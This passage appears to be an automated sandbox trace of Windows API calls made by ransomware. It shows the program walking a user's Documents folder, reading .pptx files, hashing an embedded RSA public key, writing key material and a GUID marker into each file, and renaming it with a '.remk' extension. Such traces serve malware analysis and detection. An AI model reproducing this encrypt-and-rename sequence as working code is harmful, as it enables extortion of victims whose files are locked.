KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.004] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.004] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.004] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.005] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.005] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.005] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.006] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.006] GetLastError () returned 0x0 [0232.006] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.006] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.006] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.006] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.006] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.006] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.007] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1241d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.007] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.008] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.008] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.008] CloseHandle (hObject=0x640) returned 1 [0232.011] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sv6Gg5.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sv6gg5.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sv6Gg5.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sv6gg5.pptx.remk")) returned 1 [0232.013] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d61b0, ftCreationTime.dwHighDateTime=0x1d5cc6e, ftLastAccessTime.dwLowDateTime=0xba76dc90, ftLastAccessTime.dwHighDateTime=0x1d58aa0, ftLastWriteTime.dwLowDateTime=0xba76dc90, ftLastWriteTime.dwHighDateTime=0x1d58aa0, nFileSizeHigh=0x0, nFileSizeLow=0xf640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tTI9VeuENe.pptx", cAlternateFileName="TTI9VE~1.PPT")) returned 1 [0232.013] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tTI9VeuENe.pptx") returned=".pptx" [0232.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tTI9VeuENe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tti9veuene.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.014] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=63040) returned 1 [0232.014] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.016] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf61a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.016] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.018] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf640, lpOverlapped=0x0) returned 1 [0232.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.019] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.020] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.020] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.020] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.020] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.020] GetLastError () returned 0x0 [0232.021] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.021] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.021] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.021] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.021] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.021] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.022] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.022] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.023] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.023] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.023] CloseHandle (hObject=0x640) returned 1 [0232.024] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tTI9VeuENe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tti9veuene.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tTI9VeuENe.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tti9veuene.pptx.remk")) returned 1 [0232.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.026] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.027] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eac6a0, ftCreationTime.dwHighDateTime=0x1d5a7a4, ftLastAccessTime.dwLowDateTime=0x5410dae0, ftLastAccessTime.dwHighDateTime=0x1d58664, ftLastWriteTime.dwLowDateTime=0x5410dae0, ftLastWriteTime.dwHighDateTime=0x1d58664, nFileSizeHigh=0x0, nFileSizeLow=0x89a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Uq-Qf59QnD_.pptx", cAlternateFileName="UQ-QF5~1.PPT")) returned 1 [0232.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0232.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.027] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uq-Qf59QnD_.pptx") returned=".pptx" [0232.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uq-Qf59QnD_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uq-qf59qnd_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.029] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=35234) returned 1 [0232.029] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.032] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x897c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.032] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.034] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.034] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x89a2, lpOverlapped=0x0) returned 1 [0232.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.035] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.036] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.036] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.036] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.036] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.036] GetLastError () returned 0x0 [0232.036] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.036] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.036] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.036] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.036] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x89a0) returned 0x37c2278 [0232.037] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1cf8 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0b8 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1d40 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0d0 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee100 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee118 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.038] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee100 | out: hHeap=0x630000) returned 1 [0232.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee118 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee100 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee100 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.039] GetCurrentThreadId () returned 0x314 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8b70 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.039] GetCurrentThreadId () returned 0x314 [0232.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.040] 